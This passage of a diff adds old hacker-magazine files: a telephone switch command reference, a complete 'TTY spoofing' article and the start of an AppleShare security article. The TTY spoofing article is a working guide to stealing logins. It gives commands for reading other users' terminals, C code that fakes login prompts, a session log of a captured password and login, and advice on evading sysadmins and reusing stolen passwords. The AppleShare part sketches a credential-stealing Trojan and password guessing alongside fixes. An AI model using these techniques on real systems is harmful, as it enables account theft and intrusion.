+            1FAC - Interface packs
+            LCM  - Line Concentrating Module
+            LCMC - Line Concentrating Controller Module
+            NWPK - Network Packs
+            RCT  - Remote Concentrator Terminal
+            REM  - Remote Equipment Module
+            RSLC - Remote Subscriber Line Module Controller
+            RSLE - Remote Subscriber Line Equipment
+            RSLM - Remote Subscriber Line Module
+            SCM  - Subscriber Carrier Module (DMS-1)
+            SCS  - SCM-10S shelf (SLC-96)
+            SRI  - Subscriber Remote Interface pack
+
+NTWK        Network
+
+            ACT  - AC Testing definition
+            D1PK - DS-1 interface pack (SCM-10S)
+            DCM  - Digital Carrier Module
+            1FAC - Interface packs
+            LCM  - Line Concentrating Module
+            LPK  - Line Concentrating Equipment line packs
+            NWPK - Network packs
+            PACK - Peripheral Equipment packs
+            PMS  - Peripheral Maintenance System packs
+            PSHF - Peripheral Equipment Shelf
+            RCT  - Remote Concentrator Terminal
+            REM  - Remote Equipment Module
+            RSHF - Remote Shelf
+            SBLN - Standby line
+            SCM  - Subscriber Carrier Module
+            SCS  - SCM-10S Shelf (SLC-96)
+            SLC  - SLC-96
+            SLPK - SLC-96 Line Packs
+            SRI  - Subscriber Remote Interface (RLCM)
+
+ODQ         Office Data Query
+
+            ACDN - Access Directory Number
+            CG   - Carrier group
+            CNTS - Counts
+            DN   - Directory Number
+            DTRK - Digital Trunks (line and trunk)
+            LINE - Lines (line and trunk)
+            PIN  - Personal Identification Number
+            STOR - Memory Storage
+            TG   - Trunk Group
+            TRK  - Trunks (line and trunk)
+
+QTRN        Query Translations
+
+            ADDR - Address Translations
+            EBSP - Enhanced Business Services prefix translations
+            ESAP - Emergency Stand-Alone Prefix
+            PRFX - Prefix translations
+            SCRN - Screening translations
+            TRVR - Translation verification
+
+ROUT        Routes
+
+            CONN - Nailed-up connections
+            DEST - Destinations
+            POS  - Centralized Automatic Message Accounting positions
+            ROUT - Routes
+            TR   - Toll regions
+
+SNET        CCS7 Signaling Network
+
+            SNLS - Signaling Link Set
+            SNL  - Signaling Link
+            SNRS - Signaling Network Route Set
+
+TG          Trunk Groups
+
+            INC  - Incoming trunk groups
+            OUT  - Outgoing trunk groups
+            2WAY - Two-way trunk groups
+
+THGP        Thousands Groups
+
+TRAC        Call Tracing
+
+TRK         Trunks
+
+            DTRK - Digital Trunks
+            TRK  - Analog or digital recorded announcement trunks
+
+TRNS        Translations
+
+            ADDR - Address translations
+            EBSP - EBS prefix translations
+            ESAP - Emergency Stand-Alone prefix
+            PRFX - Prefix translations
+            SCRN - Screening translations
+
+
+V. SPEC SHEET
+
+Maximum # Subscriber Lines:            10,800
+     (in stand-alone mode)
+
+Maximum # Trunks:                       3,408
+     - Incoming Trunk Groups:             127
+     - Outgoing Trunk Groups:             127
+     - Two-way Trunk Groups:              127
+     - Maximum Routes:                    512
+     - Maximum Trunks per Group:          255
+
+Directory Numbers:                     16,000
+
+Office Codes:                               8
+
+Home Numbering Plan Area:                   4
+
+Thousands Groups:                          64
+
+Number of Network Groups:              1 or 2
+
+Total Network Capacity:
+    - One Network Module:               5,400 POTS lines + 600 trunks
+    - Two Network Module:              10,800 POTS lines + 1,200 trunks
+
+Traffic
+     - Busy Hour Calls                 38,000
+     - Average Busy Season             29,000
+         Busy Hour Attempts
+     - CCS per line                      5.18 centi call seconds
+     - CCS per trunk                     27.0 centi call seconds
+     - Total CCS                      133,000 centi call seconds
+
+Outpulsing                    DP, MF, or DTMF
+
+Inpulsing
+     - Trunks                 DP, MF, or DTMF
+     - Lines                       DP or DTMF
+
+Register Capacity
+     - Outgoing                  DP=16 digits
+                               DTMF=16 digits
+                                 MF=14 digits+KP+ST
+                            LEAS MF=20 digits+KP+ST
+                             [LEAS Route Access]
+
+     - Incoming                  DP=14 digits
+                               DTMF=16 digits
+                                 MF=14 digits
+
+
+VI. LIMITED GLOSSARY
+
+DP - Dial Pulse.  A form of signaling that transmits pulse trains to indicate
+     digits.  Slow compared to DTMF and MF.  Made obsolete by DTMF.  Old
+     step-by-step switches use this method, and there are still quite a few
+     subscriber lines that use DP, even though DTMF is available.
+
+In-band Signaling - Transmitting control signals in the 300 - 3300 hz voice
+                    band, meaning that they're audible to subscribers.
+
+Out-of-band Signaling - Transmitting control signals above or below the 300 -
+                        3300 hz voice band.  See SS7, CCS7.
+
+DTMF - Dual Tone Multi-Frequency.  A form of in-band signaling that transmits
+       two tones simultaneously to indicate a digit.  One tone indicates the
+       row and the other indicates a column.  A fast, technically simple way of
+       dialing that is in use almost all over the United States.  White boxes
+       generate DTMF tones, a.k.a. "Touch Tones" or Digitones.  See DP, MF.
+
+MF - Multi-frequency.  A form of in-band signaling similar to DTMF, except the
+     signals are encoded differently (i.e., the row and column tones are
+     different, because the keypad for MF tones isn't laid out in a rectangular
+     matrix).  These are the "operator tones."  Blue boxes generate these
+     tones. See DTMF, In-band signaling.
+
+CCS7 - Common Channel Signaling 7.  Part of the Signaling System 7
+       specification, CCS7 transmits control signals either above or below the
+       voice band to control switch equipment, so control signals may be
+       transmitted simultaneously with voice.  See SS7.
+
+SS7 - Signaling System 7.  An inter-switch signaling protocol developed by
+      Bellcore, the RBOCs' research consortium.  Relatively new, this protocol
+      can be run only on digital switches. See CCS7, CLASS.
+
+CLASS - Custom Local Area Signaling Services.  Several subscriber-line features
+        that are just being introduced around the United States at the time of
+        this article.  See SS7, CCS7.
+
+Centrex - A scheme that turns a switch into an off-site PBX for business users.
+          It can usually co-exist with existing lines.
+
+
+If anyone has any more questions, contact me at WWIVNet THE CAVALIER@3464.
+
+Thanks to Northern Telecom (the nicest sales staff in the world of switch
+manufacturers, with a killer product to boot!), Pink Flamingo, Taran King,
+Grim, and the crew who supported the NFX in "days of yore."
diff --git a/phrack41/8.txt b/phrack41/8.txt
new file mode 100644
index 0000000..f13348b
--- /dev/null
+++ b/phrack41/8.txt
@@ -0,0 +1,467 @@
+                                ==Phrack Inc.==
+
+                   Volume Four, Issue Forty-One, File 8 of 13
+
+                          ++++++++++++++++++++++++++++
+                    +++++++                          +++++++
+                    +++++++       TTY SPOOFING       +++++++
+                    +++++++                          +++++++
+                     ++++++            BY            ++++++
+                      +++++                          +++++
+                        +++         VaxBuster        +++
+                         ++                          ++
+                          ++++++++++++++++++++++++++++
+
+                                 July 16, 1992
+
+
+     Please note that this file is ONLY to be distributed as part of Phrack,
+and will NOT be distributed to any other person or magazine for release.
+
+     More detailed instructions have been provided so that the novice hacker is
+able to understand them; therefore, all experienced hackers should be able to
+breeze right through this without having to worry about the specific command
+syntax provided.
+
+     On UNIX systems, there are many ways to obtain account names and
+passwords.  Some hackers prefer to swipe the password file and run programs
+like Crack and Killer Cracker on them in order to get account names and
+passwords.  Others rely on bugs or holes in the system in order to gain root
+access.  Both these methods work, but what do you do if your password file is
+shadowed (and it is NOT a yellow pages file!)?  And what do you do if all the
+holes have been patched over from years of previous hackers abusing them? Well,
+I happen to have found a system where all this is true.  I have even allowed
+hackers to use one of my accounts to try to gain root privs, and of the 10 or
+so that have tried, they have all failed.  My only recourse was to find SOME
+other way to get accounts on the system to maintain MY security.
+
+     TTY spoofing is often looked at as being lame, and some don't even
+consider it a "hacking technique."  People usually completely overlook it, and
+many others don't even know about it, or know HOW to do it.  I suppose I should
+start out by defining the term.  TTY spoofing is either installing a Trojan
+horse type program to sit and watch a certain (or multiple) tty and wait for a
+user to login.  Instead of getting the normal system prompt, the program YOU
+installed echoes the standard "login:" prompt, and then after they type in
+their username, it prompts them for "<username> password:" and boom, you have a
+new account.  This can be done by a program or, in many cases, manually.
+
+     Of all the people I know, 90 percent of them scream at me saying that this
+is impossible because their system doesn't allow read/write access to the tty.
+When I make references to tty, I mean the physical device filename or
+/dev/ttyxx where xx is either numeric, alphabetic, or alphanumeric characters
+(e.g., 03, pa, p4 are all valid).  Of all the systems I've been on, I've never
+seen one that doesn't allow reading/writing to a LOGIN process.  See, the
+system doesn't change the tty to owner r/w ONLY until AFTER HIS USERNAME AND
+PASSWORD HAS BEEN VERIFIED.  Console, or ttyco, is an exception where the perms
+are ALWAYS -rw------.
+
+     Now that you know WHAT tty spoofing is and the general idea behind WHY it
+works, I'll start to tell you the many ways it can be done.
+
+     In order to tty spoof, you MUST have at least ONE valid account on the
+system.  You can obtain the account via a little social engineering, or you
+could try a /who *sitename in the IRC to get nicknames and use their username
+and try to hack out the password.  Try looking for users in #hottub and other
+st00pid channels because they are the ones who would tend to have the easy
+passwords.  Or use any other method that you can think of to obtain an account.
+
+     Once you have an account, the rest is the easy part.  Simply create a
+script in vi or emacs that redirects input from UNUSED tty's to cat.  Since you
+are cat's standard output, everything coming FROM the monitored tty will come
+to your screen.  You probably want to watch about 10 or 15 terminals.  An
+example script would be:
+cat </dev/tty01&
+cat </dev/tty02&
+cat </dev/ttypa&
+cat </dev/ttyp1&
+
+     Then you want to just run your script with source.  Once a user walks up
+to a terminal (or remotely logs in via telnet, etc.), they will try to press
+return and attempt to get a login prompt.  Many users will also type their
+username, thinking that the system is just waiting for it.  Make sure you write
+down the username.  After a while, they will probably start pressing control
+characters, like control-d or z or whatever.  Here's the problem:  when CAT
+encounters the ^D, it thinks that it is receiving an EOF in the file and it
+thinks its job is done.  You'll get something to the effect of:
+
+[2] Exit           DONE                        cat </dev/tty01
+
+or
+
+[2] Exit 1         cat:i/o error               cat </dev/tty01
+
+You want to IMMEDIATELY (if not sooner) "recat" that terminal.  Once you get
+that DONE signal, you now know WHAT terminal is active.  You want to then type
+something to the effect of 'echo -n "login:" >/dev/tty01&'.  The & is important
+because if the user decided to switch terminals, echo could lock up and freeze
+your control on the account.  If after about 10 seconds echo doesn't come back
+as:
+
+[5] Exit            DONE                        echo -n login: >/dev/tty01
+
+KILL the process.  When you ran the echo command, the shell gave you a
+processid.  Just type KILL processid.  If the done echo line DOES come back,
+that means that it was successfully printed on the user's screen.  He will then
+type in his username.  WRITE THIS DOWN.  If you are ever in doubt that the word
+on your screen is a username, type 'grep word /etc/passwd' and if a line comes
+up, you know it's valid.  If grep doesn't return anything, still keep it
+because it might be a password.  Then wait about 2 seconds, and type
+'echo -n "<username> password:" >/dev/tty01&' again using the & to prevent
+lockage.  If that command doesn't come back in about 10 seconds, kill the
+process off and you can assume that you lost the user (e.g. he moved to another
+terminal).  If the done echo line DOES come back, then in about 2 seconds, you
+SHOULD see his password come up.  If you do, write it down, and boom, you have
+a new account.
+
+     This may seem like a time consuming process and a lot of work, but
+considering that if you have macros with the "cat </dev/tty" command and the
+echo -n commands preset, it will be a breeze.  Okay - so you say to yourself,
+"I'm a lazy shit, and just want passwords to be handed to me on a silver
+platter."  With a little bit of work, you can do that!  Below is a few lines of
+C source code that can be used to automate this process.  Anyone who knows C
+should be able to put something together in no time.
+
+#include <stdio.h>
+
+FILE *fp, *fp2;
+char username[10], password[10];
+
+main()
+{
+      fp=fopen("/dev/ttyp1", "r");
+      fp2=fopen("/dev/ttyp1", "w");
+
+      fprintf(fp2, "login:");
+      fscanf(fp, "%s", &username);
+
+      /* Put delay commands in here */
+
+      fprintf(fp2, "%s password:", username);
+      fscanf(fp, "%s", @password);
+
+      printf("Your new account info is %s, with password %s.", username,
+                password);
+}
+
+     This is a VERY basic setup.  One could fairly easily have the program take
+arguments from the command line, like a range of tty's, and have the output
+sent to a file.
+
+     Below is an actual session of manual tty spoofing.  The usernames and
+passwords HAVE been changed because they will probably be active when you read
+this.  Some c/r's and l/f's have been cut to save space.  Please notice the
+time between the startup and getting a new account is only seven minutes.
+Using this technique does not limit the hacked passwords to dictionary
+derivatives like Crack and other programs.
+
+source mycats                              ; This file contains cats
+                                    ; for terminals tty03 - tty10
+[1] 29377
+/dev/tty03: Permission denied       ; All this means is that someone is logged
+in
+                                ; and has their mesg set to NO.  Ignore it.
+
+[1]    Exit 1               cat < /dev/tty03
+[2] 29378
+[3] 29379
+/dev/tty06: Permission denied
+/dev/tty05: Permission denied
+[4]    Exit 1               cat < /dev/tty06
+[3]    Exit 1               cat < /dev/tty05
+/dev/tty07: Permission denied
+[3]    Exit 1               cat < /dev/tty07
+/dev/tty08: Permission denied
+[3]    Exit 1               cat < /dev/tty08
+[2]  + Stopped (tty input)    cat < /dev/tty04      ;This was the terminal I
+was
+                                                ;on - it's automatically
+                                    ;aborted...
+[3] 29383
+<5:34pm><~> /dev/tty09: Permission denied
+[3]    Exit 1               cat < /dev/tty09
+<5:34pm><~> source mycats2                  ;This one contains 34 - 43
+
+[3] 29393
+[4] 29394
+[5] 29395
+[6] 29396
+[7] 29397
+[8] 29398
+[9] 29399
+/dev/tty36: Permission denied
+/dev/tty37: Permission denied
+/dev/tty38: Permission denied
+/dev/tty39: Permission denied
+/dev/tty40: Permission denied
+/dev/tty34: Permission denied
+/dev/tty35: Permission denied
+
+[9]    Exit 1               cat < /dev/tty40
+[8]    Exit 1               cat < /dev/tty39
+[7]    Exit 1               cat < /dev/tty38
+[6]    Exit 1               cat < /dev/tty37
+[5]    Exit 1               cat < /dev/tty36
+[4]    Exit 1               cat < /dev/tty35
+[3]    Exit 1               cat < /dev/tty34
+
+[1] 29400
+[3] 29401
+[4] 29402
+
+<5:34pm><~> /dev/tty41: Permission denied
+
+[1]    Exit 1               cat < /dev/tty41
+/dev/tty43: Permission denied
+[4]    Exit 1               cat < /dev/tty43
+/dev/tty42: Permission denied
+[3]    Exit 1               cat < /dev/tty42
+
+<5:34pm><~> source mycats3                        ;This contains p1-pa
+
+[3] 29404
+[4] 29405
+[5] 29406
+[6] 29407
+[7] 29408
+/dev/ttyp1: Permission denied
+/dev/ttyp3: Permission denied
+/dev/ttyp5: Permission denied
+/dev/ttyp6: Permission denied
+
+[8]    Exit 1               cat < /dev/ttyp6
+[7]    Exit 1               cat < /dev/ttyp5
+[5]    Exit 1               cat < /dev/ttyp3
+[3]    Exit 1               cat < /dev/ttyp1
+[7] 29410
+[8] 29411
+[9] 29412
+[1] 29413
+
+<5:34pm><~> /dev/ttyp7: Permission denied
+
+[7]    Exit 1               cat < /dev/ttyp7
+/dev/ttypa: Permission denied
+[1]    Exit 1               cat < /dev/ttypa
+
+<5:34pm><~> source mycats4                         ;Last one is q0-qa
+
+[1] 29426
+[3] 29427
+[5] 29428
+[7] 29429
+[10] 29430
+[11] 29431
+/dev/ttyq5: Permission denied
+
+[10]   Exit 1               cat < /dev/ttyq5
+[12] 29432
+[10] 29433
+[13] 29434
+[14] 29435
+<5:34pm><~> who
+
+<5:34pm><~> nnnnnnnnrlogin unx        ; He thought he didn't type it right.
+pigsnort                                ; Important!  Write down ALL non-
+                              ; system sent messages!
+<5:35pm><~>
+grep pigsnort /etc/passwd               ; Check with grep to see if it's an
+                              ; account.
+
+<5:35pm><~>                             ; Didn't return anything - must be a
+                              ; a password!
+
+nnnpptst8                               ; Sure looks like an account name to
+nnnnn=====                              ; me!  Write it down!
+
+ls
+
+[8]    Done                   cat < /dev/ttyp8  ; Asshole pressed control-d.
+                                    ; 'recat' the terminal!
+
+<5:36pm><~> cat  < /d e v/  ttyp8&             ; This is the 'recat.'
+
+[8] 29459
+<5:36pm><~> cat: read error: I/O error            ; Asshole is now trying all
+                                    ; sorts of control characters
+                                    ; sending UNIX into a fit.
+[4]    Exit 1               cat < /dev/ttyp2
+
+<5:36pm><~> cat </dev/ttyp2&                  ; 'recat' it!
+
+[4] 29465
+<5:36pm><~>
+
+<5:36pm><~>
+
+[6]    Done                   cat < /dev/ttyp4  ; Someone had to press the
+                                                ; character, so this is active.
+
+<5:36pm><~> cat </dev/ttyp4&                  ; 'recat' the ctrl-d.
+
+[6] 29468
+<5:36pm><~> echo -n "login:" >/dev/ttyble1      ; Try echo'ing a fake login
+cat: read error: I/O error                  ; to the active terminal.
+
+[6]    Exit 1               cat < /dev/ttyp4
+poop4d                                          ; Here goes another password.
+p4                                              ; Couldn't find the matching
+&                                    ; account.
+
+[6] 29470
+<5:37pm><~> cat: read error: I/O error
+
+
+[4]    Exit 1               cat < /dev/ttyp2
+
+
+<5:37pm><~> cat </dev/ttyp2&
+
+[4] 29489
+<5:37pm><~> echo -n "login:" >/dev/ttyp2&      ; Try echo'ing a fake login
+                                    ; prompt again.
+[15] 29490
+<5:37pm><~> kill 29490                        ; Login prompt didn't return
+                                    ; within a few seconds so we
+                                                ; kill it.
+
+[15]   Terminated             echo -n login: > /dev/ttyp2
+<5:37pm><~> cat </dev/tty
+echo -n "login:" >/dev/ttyp4&
+
+[15] 29491
+<5:38pm><~> kill 29491
+
+<5:38pm><~> grep pptst8 /etc/passwd             ; Make sure it's an account!
+
+pptst8:X:58479:4129:People Eater:/ucuc.edu/usr/pptst8:/bin/bash
+<5:38pm><~> grep ble1 /etc/passwd               ; This isn't an account...
+
+<5:39pm><~> grep poop4d /etc/passwd             ; Neither is this - probably
+                                    ; a password...
+
+<5:39pm><~> who                              ; See if any of the users we
+                                    ; caught fell through an
+                                    ; 'uncatted' terminal...
+
+<5:39pm><~> ps -x                               ; View all our processes.
+                                    ; DAMN glad that the cat's
+  PID TT STAT  TIME COMMAND                     ; don't come up in the process
+29266 04 S     0:04 -tcsh (tcsh)            ; list!
+29378 04 T     0:00 cat
+29412 04 I     0:00 -tcsh (tcsh)
+29426 04 I     0:00 -tcsh (tcsh)
+29427 04 I     0:00 -tcsh (tcsh)
+29428 04 I     0:00 -tcsh (tcsh)
+29429 04 I     0:00 -tcsh (tcsh)
+29431 04 I     0:00 -tcsh (tcsh)
+29432 04 I     0:00 -tcsh (tcsh)
+29433 04 I     0:00 -tcsh (tcsh)
+29434 04 I     0:00 -tcsh (tcsh)
+29435 04 I     0:00 -tcsh (tcsh)
+29459 04 I     0:00 -tcsh (tcsh)
+29470 04 D     0:00 <exiting>
+29489 04 I     0:00 -tcsh (tcsh)
+29491 04 D     0:00 -tcsh (tcsh)
+29547 04 R     0:00 ps -x
+<5:40pm><~> kill 29378 29412 29426 29427 29428 29429 29431 29432 29433 29434 29
+
+435 29459 29470 29489 289491                    ;Kill off all processes.
+
+29470: No such process
+
+[4]    Terminated             cat < /dev/ttyp2
+[8]    Terminated             cat < /dev/ttyp8
+[14]   Terminated             cat < /dev/ttyqa
+[13]   Terminated             cat < /dev/ttyq9
+[10]   Terminated             cat < /dev/ttyq8
+[12]   Terminated             cat < /dev/ttyq7
+[11]   Terminated             cat < /dev/ttyq6
+[7]    Terminated             cat < /dev/ttyq4
+[5]    Terminated             cat < /dev/ttyq3
+[3]    Terminated             cat < /dev/ttyq2
+[1]    Terminated             cat < /dev/ttyq1
+[9]    Terminated             cat < /dev/ttyp9
+[2]    Terminated             cat < /dev/tty04
+
+<5:41pm><~>
+
+[15]   Terminated             echo -n login: > /dev/ttyp4
+[6]    Done                   echo -n login: > /dev/ttyp4
+
+<5:41pm><~> ps -x
+
+  PID TT STAT  TIME COMMAND
+29266 04 S     0:04 -tcsh (tcsh)
+29594 04 R     0:00 ps -x
+<5:41pm><~> logout
+
+Local -011- Session 1 disconnected from UNIX1
+
+Local> c unx                                    ; Notice it's a different
+                                                ; system but shares passwords.
+Local -010- Session 1 to UNX on node MYUNX established
+
+Welcome to ucuc.edu.
+
+login: ble1                                     ; Test out all the accounts
+ble1 password:  [I tried poop4d]                ; with all the passwords.
+Login failed.
+login: pptst8
+pptst8 password: [I tried poop4d here too.]
+Login failed.
+login: pptst8
+pptst8 password: [I typed pigsnort]
+Authenticated via AFS Kerberos.                 ; BINGO!  We're in!
+Checking system rights for <pptst8>... login permitted.
+login 1.0(2), Authen
+Last login: Fri Jul 17 17:33:30 on tty11
+
+(1) unix $ ls                                   ; Let's see what this sucker
+                                                ; has...hmm...an IRC user, eh?
+Mail      Mailbox      News      bin      irc      other      junk      private
+public
+(2) unix $ logout
+
+Local -011- Session 1 disconnected from UNX
+
+     A few words of advice:  Monitor the tty's when it's the busiest time of
+the day, usually about 11am on a university system.  Kill all your processes
+before you hang up.  Those processes that you run will sit on the system and
+can be found by sysadmins.  Also, they will tie up those tty's that you are
+monitoring, which can also cause problems.  Point is, you DON'T want to attract
+attention to what you're doing.  Don't test the accounts you get immediately.
+If the victim happens to be doing a 'who' and sees two of himself, he is going
+to shit.  Wait until later or use a different subsystem that won't show up on
+his 'who'.
+
+Don't take over accounts.  All the real user has to do is call up the office
+and tell them that their password was changed.  In two seconds, it'll be
+changed back, plus the sysadmin will be on the lookout so you're just one step
+BEHIND where you started.  Once you have someone's account info, kill the cat
+that is sucking the terminal so that the user can log in normally.  If he
+continues not to get ANYTHING, he may go and solicit some "professional" help,
+and THEY might know what's going on, so let the sucker log in.  Another thing:
+with accounts you get.
+
+DO NOT DESTROY ANYTHING in the system, not in their account, and no where else
+if you get higher privs.  Chances are that the person is NOT going to know
+someone has obtained their password, and will have NO reason to change it.
+Wait until his college term/semester ends and then monitor the file dates.  If
+after about a month the dates don't change, change the password and do whatever
+you want to the account because he's probably done with it.
+
+Oh and one last thing.  Once you have a valid account, grep the username and
+get the REAL name.  Then grep the REAL name and find out all accounts on the
+system that the guy owns.  Chances are that he is using the same password in
+multiple accounts!
+
+Thanks go to Pointman, #hack members, and the entire current/past Phrack staff
+for putting out an excellent magazine over the years.
+
+If you need to contact me, try the IRC in #hack and the VMB world.  I usually
+prefer NOT to be contacted by e-mail, but if you have my address and have an
+important question, go for it.  I'm willing to help any beginners who need it.
+
+Happy Hacking!
+
+VaxBuster '92
diff --git a/phrack41/9.txt b/phrack41/9.txt
new file mode 100644
index 0000000..401b683
--- /dev/null
+++ b/phrack41/9.txt
@@ -0,0 +1,311 @@
+                                ==Phrack Inc.==
+
+                   Volume Four, Issue Forty-One, File 9 of 13
+
+- = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = -
+
+                  Security Shortcomings of AppleShare Networks
+
+                                 By Bobby Zero
+
+                               November 28, 1992
+
+- = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = -
+
+        The purpose of this file is to inform all those underpaid Mac network
+administrators or other interested parties of the problems with Macintosh
+AppleShare and how to address those problems.  AppleShare is quite respectable
+in both its implementation and usage, blending seamlessly with the Macintosh OS
+such that the casual user has no idea of the complexity behind the elegance.
+For all its elegance, however, it does have some severe drawbacks in terms of
+security-- nearly all of which are fixable, requiring a combination of common
+sense and RTFM:  Read The Fucking Manual.
+
+        This is in no way to be considered as a "How To" for persons of
+questionable ethics and/or motives.  That being said, however, I feel the
+following is in order:
+
+PROSECUTOR:  [To WITNESS] ...And you are?
+
+WITNESS:  Miss America.
+
+[Singing]
+
+PROSECUTOR:  Would you please tell the court why you feel Fielding Mellish is a
+traitor to this country?
+
+WITNESS:  I feel that Fielding Mellish is a traitor to this country because his
+views are different from the views of the President, and others of his kind.
+Differences of views should be tolerated, but not when they are too different.
+Then he becomes a subversive mother.
+
+                                      -- Woody Allen, "Bananas"
+
+
+        This file is divided into 5 sections:  (1) the "AppleShare Prep" file,
+(2) the "AShare File Srv" application, (3) Mixing VAXens & AppleShare, (4)
+System 7 FileSharing, and (5) NCSA Telnet weaknesses. The fifth does not
+particularly relate to AppleShare, but its security can be exploited via method
+#4, so I thought to include it.
+        If there is sufficient interest, I will make a "Part II" [or three or
+four or five..] detailing more problems.  Send feedback to Phrack Loopback;
+being a regular reader, I will respond accordingly.  While writing this, I was
+unsure of the approach -- either bland technical or "gh0d-these-people-
+are-dumb" statements.  I decided to just combine them, chao-like.  Well, enough
+of my rambling.  On with the file!
+
+
+                               - = - = - = - = -
+
+
+THE "APPLESHARE PREP" FILE
+~~~  ~~~~~~~~~~ ~~~~  ~~~~
+(1) The "AppleShare Prep" file under both System 6 and 7 contains a BMLS
+resource; this resource contains various information required to mount a volume
+on startup.  While this is an optional feature, many people choose it either by
+accident or for convenience.
+
+* The downside to this convenience is the fact that the user's name and
+password for a server are stored in this file.  Anyone with a copy of ResEdit
+can open this file up, and view the BMLS resource.
+
+* It's so easy to create a Trojan horse and slip it into a program or Hypercard
+stack to copy the BMLS resource from the target's AppleShare Prep file and copy
+it into a hidden file on the server drive where it can be retrieved at a later
+date.  If Mr. Ed is well-written, he would be nearly undetectable as it takes
+but an eyeblink to copy the rez.  Trojan horses aren't as sexy as viruses and
+don't get much publicity, but it is exceedingly easy to fool a Macintosh user
+[or any user, for that matter] into running something he or she shouldn't.
+
+HOW TO SOLVE:  Educate users of this flaw and urge them to log into the file
+server manually.  If computers in an open lab setting are used, configure them
+to automatically log in as a guest, thereby circumventing the entire issue of
+passwords entirely.  Encryption of the BMLS resource is entirely up to Apple or
+someone with enough knowledge of AppleShare to write a patch -- certainly not
+me [yet...].
+
+
+THE "ASHARE FILE SRV" SERVER
+~~~  ~~~~~~ ~~~~ ~~~  ~~~~~~
+(2) On AppleShare File Servers running v2.0:
+
+* The file "Users & Groups" within the Server/System Folder contains the data
+required for maintaining folder privileges & ownership.  It also contains
+user's names and passwords, in an unencrypted format.  While obtaining this
+file would be somewhat difficult [one must physically be able to access the
+server:  shut it down, restart it with a floppy, copy the file, reboot the
+machine], the "rewards" would be considerably worthwhile, as one would now have
+a copy of every user name and password, including that of the Administrator.
+Once physical access is secured, one could conceivably write a program to
+install on the server that would periodically make a copy of the file and put
+it on the "server" side of the disk, and give it an innocuous name... an INIT
+which would perform on every startup, or install a Time Task to do it daily, or
+even going so far as to patch the AppleShare Admin program to update this file
+every time a user is added or modified.  It is also common knowledge that users
+use the same passwords on different machines; armed with a list of names &
+passwords for one machine, one could then enter another computer with the same
+user/pass combination.
+
+* There is no automatic lockout for users who enter an incorrect password. With
+a bit o' knowledge and a copy of "Inside AppleTalk," a program could be written
+that could use a dictionary of common passwords in conjunction with a list of
+user names to try to manually "hack out" a valid user/password combination.
+The speed of this varies greatly on the speed of and load on the server, the
+speed of and load on the network, and the speed of the "attacking" computer.  A
+typical "hack" can take anywhere from .5 to 5 seconds, but there is no need to
+tie up the attacking computer for that period of time; the program can use both
+asynchronous AFPCommand calls and exist under Multifinder to allow for complete
+"background hacking."  It should be noted, however, that Apple has incorporated
+a lockout into the hideously overpriced AppleShare 3.0 -- its hardware
+requirements, however, seem to leave it out of the budgets of most sane
+individuals.
+
+* A group of individuals armed with the above program could go into a computer
+lab, fire up said program, and then launch a word processing application and
+seem to be doing homework while in reality they would be hacking passwords.
+
+* The "Copy Protect File" in AppleShare Admin disallows using the Finder to
+copy a "Protected" program.  That does not deter, however, a "normal" copy
+program such as DiskTop from copying the file.  [That is about as lame as the
+ol' "Bozo Bit."]
+
+HOW TO SOLVE:  Insure that physical access to the fileserver is impossible for
+all but trusted persons.  Upgrade to AppleShare 3.0 [$$ gag $$], which allows
+"locking" of accounts after a certain number of bad attempts, or obtain a
+logging program to keep track of invalid attempts and origins, then track down
+the offenders.  There's no way to stop the violation of the "Copy Protection"
+-- it deters only those easily dismayed.  All I can suggest is you keep your
+non-PD programs away from Guests or other "non-trusted" persons.
+
+
+VAXSHARE, PCLINK, AND OTHER VAX/APPLESHARE SERVER APPS
+~~~~~~~~~ ~~~~~~~ ~~~ ~~~~~ ~~~ ~~~~~~~~~~ ~~~~~~ ~~~~
+(3) There are various forms of AppleShare that can be run from a VAX; many
+versions of these programs have severe flaws which can also be exploited.
+
+* The prime example is the existence of "default" accounts:  while "Guest"
+logins might be disallowed, logging in as DEFAULT, password USER has been known
+to be effective in "getting in" -- even FIELD, SERVICE has worked.  Pathetic,
+isn't it, that these guys haven't picked up on these things?
+
+* The existence of a VAXShare [or similar] account used for AppleShare access
+can oft times be used to access the VAX.  For instance, if one is aware that a
+VAX is being used in an open lab as an AppleShare File Server, one can use
+method #1 to extract a username/password combination from the Prep file and use
+that password to gain entrance to the VAX.
+
+HOW TO SOLVE:  Disallow interactive logins on the VAX-side of the account and
+disable or repassword all "default" accounts.  If your version of
+VAX/AppleShare requires an interactive login, have a "special" program be run
+whenever the user logs in, recording the date, time, and origin of login before
+disconnecting.
+
+
+SYSTEM 7 FILE SHARING
+~~~~~~ ~ ~~~~ ~~~~~~~
+(4) With the advent of System 7.0 and "File Sharing," many users simply put
+their machines "on the net" without taking proper measures to disallow
+unauthorized access to their machine.  Several people turn Sharing on while
+their drive is selected, unwittingly allowing others to read, write, copy,
+delete, or modify the information on the drive.  Oddly enough, by default, the
+"Trash" folder is locked out, while the System Folder is, by default, left wide
+open.  A major oversight on Apple's part...  I suppose it was to discourage the
+perceived threat of "digital dumpster diving" ...?  Even I cannot fathom that
+one.
+
+* Many times the "System Folder" is left unprotected, meaning various system
+resources can be copied or modified.  One can leech the AppleTalk Remote Access
+files, any Timbuk2 or Timbuk2/Remote programs, etc. and use them to further
+penetration.
+
+* The "Users & Groups" file can be copied, then modified "at home" by a user
+running 7.0 [or by the attacking machine, if it is running 7.0] -- adding
+another "owner" account, for instance, to act as a "back door" in the event
+guest privileges are locked out by a wiser individual.
+
+* The integrity of important files can be challenged; the System file can have
+resources moved in and out of it by the attacking computer -- one of these
+resources could be a virus, a Trojan horse, or a really stupid font [like New
+York -- ugh!].
+
+* The disk is usually populated by copyrighted software; one could easily make
+pirated copies of that software.
+
+* The disk may be home to personal or otherwise "private" files -- files that
+can be read, copied, deleted, or even modified.  There was an instance in which
+a file on a shared folder was found to contain user names and passwords to a
+UNIX box on the campus network... incredibly foolish.  Fortunately, the proper
+persons were informed and the files were moved to a [presumably] safer
+location.
+
+* The attacker could have a malicious streak and choose to delete all that he
+sees.
+
+HOW TO SOLVE:  Take a giant wooden plank and soundly whack all offending users.
+Tell them of the intelligent way to use filesharing, and inform them that
+*anyone* can go in and read their resume, love notes, financial info, erotic
+poetry, etc.. that usually gets their attention. Tell them to, instead of
+sharing the entire hard drive, create a folder and entitle it "Shares" or
+something appropriately witty; then select the folder and go to "Sharing..."
+To further security, disallow the <Any User> (Guest) logins.  To better keep
+track of who's using the Macintosh, keep the "File Sharing Monitor" open or get
